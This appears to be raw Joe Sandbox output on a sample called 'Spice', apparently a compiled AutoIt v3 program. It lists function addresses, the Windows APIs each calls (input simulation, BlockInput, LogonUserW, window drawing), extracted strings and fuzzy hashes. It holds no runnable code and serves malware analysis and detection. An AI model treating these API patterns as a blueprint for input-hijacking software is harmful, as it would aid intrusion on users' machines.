Opcode Fuzzy Hash: e54856831241b7c40b81b8ab2dcce4ac6932dcd9e4930ad1fb986bb40b016e0a
Instruction Fuzzy Hash: D9F04F75A1130CBFDF00DFE0DC89AAEB7BCFF08201F004469A501E2180D7345A049B50

Uniqueness

Uniqueness Score: -1.00%

Function 00ED1AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00ED1B01
keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 00ED1B14

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 8a9233860eb9be686cb3cb20126ccbcf23cda5c90c3f1b61135b9645f9345687
Instruction ID: 2d3ddb9dbcc33d20d7ba1c6b1ab065fabad3f92fc5e89c57639839b3cc8f30ef
Opcode Fuzzy Hash: 8a9233860eb9be686cb3cb20126ccbcf23cda5c90c3f1b61135b9645f9345687
Instruction Fuzzy Hash: 7CF0497190024DEBDB04CF94C805BFE7BB4FF04315F00804AF955A6292D7799615DF94

Uniqueness

Uniqueness Score: -1.00%

Function 00EDA6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00EE9B52,?,00F0098C,?), ref: 00EDA6DA
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00EE9B52,?,00F0098C,?), ref: 00EDA6EC

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 248d611f3dc8df6cf99de96dfb920610b8ef3de9d693f902f7eaab75f6169830
Instruction ID: f193a2d0aed7bae0364ad52b42f481b9336477d40a386baa268416bfeb12adbf
Opcode Fuzzy Hash: 248d611f3dc8df6cf99de96dfb920610b8ef3de9d693f902f7eaab75f6169830
Instruction Fuzzy Hash: B7F0AE3550521DFBDB21AFA4CC48FDA77ACFF09751F008156B51CE6151DA309641CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00E9A385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E98F87,?,?,?,00000001), ref: 00E9A38A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E9A393

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 295f5e4ff7cafaa3d538dea3ec5ecf60453e5a8b68cf6ce131804185372762b9
Instruction ID: 6d8ef03834fada7f6a307499ebb5face33e3c6efd5aabeddb01d7453737e56f0
Opcode Fuzzy Hash: 295f5e4ff7cafaa3d538dea3ec5ecf60453e5a8b68cf6ce131804185372762b9
Instruction Fuzzy Hash: 17B0923106420CABCB422B91EC09B883F68FB45A62F004010FA0D44060CF625450AA91

Uniqueness

Uniqueness Score: -1.00%

Function 00EE45D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00EE45F0

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 7ad340be6953b9fa0dd67313cba65085b3ddb66fe4ae6b60e93331a3d0265244
Instruction ID: 4357b852c3eb641037dc18eea451e894eb8e260d6574ed44a2b9467445e7d9e1
Opcode Fuzzy Hash: 7ad340be6953b9fa0dd67313cba65085b3ddb66fe4ae6b60e93331a3d0265244
Instruction Fuzzy Hash: D6E0D8722002099FC310AF5AD400E86F7D8AF54760F00C416FC49E7350DF70EC008B90

Uniqueness

Uniqueness Score: -1.00%

Function 00ED51E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00ED5205

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: ed8521726e503da4aa75bbe2bc50e3a755075197f806ebdb62cc11fca125cdfa
Instruction ID: 20eb76c0850c4ca369b9260c7759333a150bbc6a2658d41c3b87396776212306
Opcode Fuzzy Hash: ed8521726e503da4aa75bbe2bc50e3a755075197f806ebdb62cc11fca125cdfa
Instruction Fuzzy Hash: 42D092A7162E0A79ED5807249E1FFB61648F3017C5F98668B7142A92C2EDD4A887A431

Uniqueness

Uniqueness Score: -1.00%

Function 00EC9369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00EC8FA7), ref: 00EC9389

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 2914fc1d2ede1f7e272b741da865c73f7e9e5992117d39ab73ef2a77d8e002c0
Instruction ID: 3a968c664407d54adbba36a9d7b3f752880d7ec216113c5b3f0c3e41737f9770
Opcode Fuzzy Hash: 2914fc1d2ede1f7e272b741da865c73f7e9e5992117d39ab73ef2a77d8e002c0
Instruction Fuzzy Hash: 82D09E3226450EABEF019EA4DD05EAF3B69EB04B01F408511FE15D51A1C775D935AB60

Uniqueness

Uniqueness Score: -1.00%

Function 00EB0722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00EB0734

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: d7770c02ba09daea4a1e945ff0d3084ba38c1f7bd6e07a62b2fac48537a110a3
Instruction ID: bc540aa20f01c6cfb594479100bda6acd33c4bb3c4d6efe563f6a9be97ec4d1a
Opcode Fuzzy Hash: d7770c02ba09daea4a1e945ff0d3084ba38c1f7bd6e07a62b2fac48537a110a3
Instruction Fuzzy Hash: D6C04CF180010DDBDB15DBA0D988EEF77BCBB04304F104455A105B2100D7749B449A71

Uniqueness

Uniqueness Score: -1.00%

Function 00E9A354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E9A35A

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0c34419d9febf82cccda4cec359e6b4a1d84c1bcb7e23b38be56c5643a4a6dc3
Instruction ID: c002dcee983b596693e1d43f4e7bf216d7653966eacbbd632dc3f4c17e2201d7
Opcode Fuzzy Hash: 0c34419d9febf82cccda4cec359e6b4a1d84c1bcb7e23b38be56c5643a4a6dc3
Instruction Fuzzy Hash: 6BA0113002020CABCB022B82EC08888BFACEA002A0B008020F80C000228B32A820AA80

Uniqueness

Uniqueness Score: -1.00%

Function 00EE7EF0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00EE7F45
DeleteObject.GDI32(00000000), ref: 00EE7F57
DestroyWindow.USER32 ref: 00EE7F65
GetDesktopWindow.USER32 ref: 00EE7F7F
GetWindowRect.USER32(00000000), ref: 00EE7F86
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00EE80C7
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00EE80D7
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE811F
GetClientRect.USER32(00000000,?), ref: 00EE812B
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00EE8165
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE8187
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE819A
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE81A5
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE81AE
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE81BD
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE81C6
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE81CD
GlobalFree.KERNEL32(00000000), ref: 00EE81D8
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE81EA
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00F03C7C,00000000), ref: 00EE8200
GlobalFree.KERNEL32(00000000), ref: 00EE8210
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00EE8236
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00EE8255
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE8277
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE8464

Strings

AutoIt v3, xrefs: 00EE8117
, xrefs: 00EE83EA
DISPLAY, xrefs: 00EE82C7
static, xrefs: 00EE815F, 00EE82B6

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: d5c4a98d041e1d0459daeb9247d2f03b0ac032519f01a046276432985f75a131
Instruction ID: ae6d9045a127fcdccd4fa911ceb6055ca0c4f9c2e9272ef9e280c59935369b4c
Opcode Fuzzy Hash: d5c4a98d041e1d0459daeb9247d2f03b0ac032519f01a046276432985f75a131
Instruction Fuzzy Hash: B2026C71A00209EFDB14DF65CD89EAE7BB9FB48310F048159F919AB2A1CB71AD01DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00EF3BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00F00980), ref: 00EF3C65
IsWindowVisible.USER32(?), ref: 00EF3C89

Strings

FINDSTRING, xrefs: 00EF3DB4
GETCURRENTSELECTION, xrefs: 00EF3E21
GETLINECOUNT, xrefs: 00EF3F04
TABRIGHT, xrefs: 00EF3CDB
DELSTRING, xrefs: 00EF3D87
GETCURRENTLINE, xrefs: 00EF3F2B
ISCHECKED, xrefs: 00EF3E77
UNCHECK, xrefs: 00EF3EC1
SENDCOMMANDID, xrefs: 00EF4018
SHOWDROPDOWN, xrefs: 00EF3D1E
GETLINE, xrefs: 00EF3FD9
EDITPASTE, xrefs: 00EF3F9D
GETCURRENTCOL, xrefs: 00EF3F66
CHECK, xrefs: 00EF3EAB
CURRENTTAB, xrefs: 00EF3CFB
TABLEFT, xrefs: 00EF3CC5
SELECTSTRING, xrefs: 00EF3E44
SETCURRENTSELECTION, xrefs: 00EF3DF4
ISENABLED, xrefs: 00EF3CA9
ISVISIBLE, xrefs: 00EF3C75
ADDSTRING, xrefs: 00EF3D54
HIDEDROPDOWN, xrefs: 00EF3D3E
GETSELECTED, xrefs: 00EF3EE1

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: d8baca12fa43143a16cec4b26302e9d7bb87033be561df9713f0a34383357d7e
Instruction ID: 6fe6e0b82eb8a792d48f3cff20b5eba141ed929bdba77a4d8d038f65160902e2
Opcode Fuzzy Hash: d8baca12fa43143a16cec4b26302e9d7bb87033be561df9713f0a34383357d7e
Instruction Fuzzy Hash: 4DD14F70204219CBCB14EF20C551ABEB7E5AF94344F549458FA857B2E2CF32ED4ADB92

Uniqueness

Uniqueness Score: -1.00%

Function 00EFABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00EFAC55
GetSysColorBrush.USER32(0000000F), ref: 00EFAC86
GetSysColor.USER32(0000000F), ref: 00EFAC92
SetBkColor.GDI32(?,000000FF), ref: 00EFACAC
SelectObject.GDI32(?,?), ref: 00EFACBB
InflateRect.USER32(?,000000FF,000000FF), ref: 00EFACE6
GetSysColor.USER32(00000010), ref: 00EFACEE
CreateSolidBrush.GDI32(00000000), ref: 00EFACF5
FrameRect.USER32(?,?,00000000), ref: 00EFAD04
DeleteObject.GDI32(00000000), ref: 00EFAD0B
InflateRect.USER32(?,000000FE,000000FE), ref: 00EFAD56
FillRect.USER32(?,?,?), ref: 00EFAD88
GetWindowLongW.USER32(?,000000F0), ref: 00EFADB3

Part of subcall function 00EFAF18: GetSysColor.USER32(00000012), ref: 00EFAF51
Part of subcall function 00EFAF18: SetTextColor.GDI32(?,?), ref: 00EFAF55
Part of subcall function 00EFAF18: GetSysColorBrush.USER32(0000000F), ref: 00EFAF6B
Part of subcall function 00EFAF18: GetSysColor.USER32(0000000F), ref: 00EFAF76
Part of subcall function 00EFAF18: GetSysColor.USER32(00000011), ref: 00EFAF93
Part of subcall function 00EFAF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EFAFA1
Part of subcall function 00EFAF18: SelectObject.GDI32(?,00000000), ref: 00EFAFB2
Part of subcall function 00EFAF18: SetBkColor.GDI32(?,00000000), ref: 00EFAFBB
Part of subcall function 00EFAF18: SelectObject.GDI32(?,?), ref: 00EFAFC8
Part of subcall function 00EFAF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00EFAFE7
Part of subcall function 00EFAF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EFAFFE
Part of subcall function 00EFAF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00EFB013

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 94e8a36a5506e27a73f2a5565f3dd95b6ebb274110894967e37533f1ee0bc546
Instruction ID: 365a2af089b350e20019fcbad72c1cb77a79918609acd1079e8411688273d27c
Opcode Fuzzy Hash: 94e8a36a5506e27a73f2a5565f3dd95b6ebb274110894967e37533f1ee0bc546
Instruction Fuzzy Hash: 37A1A2B1008309AFD7119F64DC08F6B7BA9FF88325F145A29F666AA1E0DB31D940DF52

Uniqueness

Uniqueness Score: -1.00%

Function 00E72FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00E73072
DeleteObject.GDI32(00000000), ref: 00E730B8
DeleteObject.GDI32(00000000), ref: 00E730C3
DestroyIcon.USER32(00000000,?,?,?), ref: 00E730CE
DestroyWindow.USER32(00000000,?,?,?), ref: 00E730D9
SendMessageW.USER32(?,00001308,?,00000000), ref: 00EAC77C
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00EAC7B5
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00EACBDE

Part of subcall function 00E71F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E72412,?,00000000,?,?,?,?,00E71AA7,00000000,?), ref: 00E71F76

SendMessageW.USER32(?,00001053), ref: 00EACC1B
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00EACC32
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00EACC48
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00EACC53

Strings

0, xrefs: 00EACA72

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: dc699cb044998f827f0446e9bb5fc5972b2a3ba22e88aa58f6051fc4701776aa
Instruction ID: 5533b5ce60d10a22fbdd46a8f9664ba109cdcd5c49342b6ccf98137f9763258b
Opcode Fuzzy Hash: dc699cb044998f827f0446e9bb5fc5972b2a3ba22e88aa58f6051fc4701776aa
Instruction Fuzzy Hash: 4B129D30604201EFDB65CF24C884BA9BBE5BF49314F24A569E589EF262CB31FD41DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E827FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

Part of subcall function 00E90FE6: std::exception::exception.LIBCMT ref: 00E9101C
Part of subcall function 00E90FE6: __CxxThrowException@8.LIBCMT ref: 00E91031

__wcsnicmp.LIBCMT ref: 00E8286A
__wcsnicmp.LIBCMT ref: 00E8287E
__wcsnicmp.LIBCMT ref: 00E82896
__wcsnicmp.LIBCMT ref: 00E828AE
__wcsnicmp.LIBCMT ref: 00E828C6
__wcsnicmp.LIBCMT ref: 00E828DE
__wcsnicmp.LIBCMT ref: 00E828F6
__wcsnicmp.LIBCMT ref: 00E8290A
__wcsnicmp.LIBCMT ref: 00E82948
__wcsnicmp.LIBCMT ref: 00E8295C
__wcsnicmp.LIBCMT ref: 00E82970
__wcsnicmp.LIBCMT ref: 00E82984

Strings

#cs, xrefs: 00E82904, 00E82956
#OnAutoItStartRegister, xrefs: 00E828A8
#comments-end, xrefs: 00E8296A
#requireadmin, xrefs: 00E82890
#include, xrefs: 00E828D8
#include-once, xrefs: 00E828C0
Bad directive syntax error, xrefs: 00EBFBD3, 00EBFBF0
", xrefs: 00EBFB89
#pragma compile, xrefs: 00E82864
#notrayicon, xrefs: 00E82878
', xrefs: 00EBFB9F
#comments-start, xrefs: 00E828F0, 00E82942
Cannot parse #include, xrefs: 00EBFCE5
#ce, xrefs: 00E8297E
Unterminated group of comments, xrefs: 00EBFCFA

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 2660009612-1645009161
Opcode ID: 7ea2fe095503e14d11b04942549148bb86b31538667cf38b0cb997398fd21b5e
Instruction ID: 437856cbe85f11e2cea55a1aa60571c64366631d9cd8fcfaaa8dcb1c5b31298d
Opcode Fuzzy Hash: 7ea2fe095503e14d11b04942549148bb86b31538667cf38b0cb997398fd21b5e
Instruction Fuzzy Hash: 45A18D30A00209ABCF15BF61DC52EAF7BA8AF44740F146069F90DBA292DB71DE41EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00EE7B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00EE7BC8
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EE7C87
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00EE7CC5
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00EE7CD7
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00EE7D1D
GetClientRect.USER32(00000000,?), ref: 00EE7D29
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00EE7D6D
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EE7D7C
GetStockObject.GDI32(00000011), ref: 00EE7D8C
SelectObject.GDI32(00000000,00000000), ref: 00EE7D90
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00EE7DA0
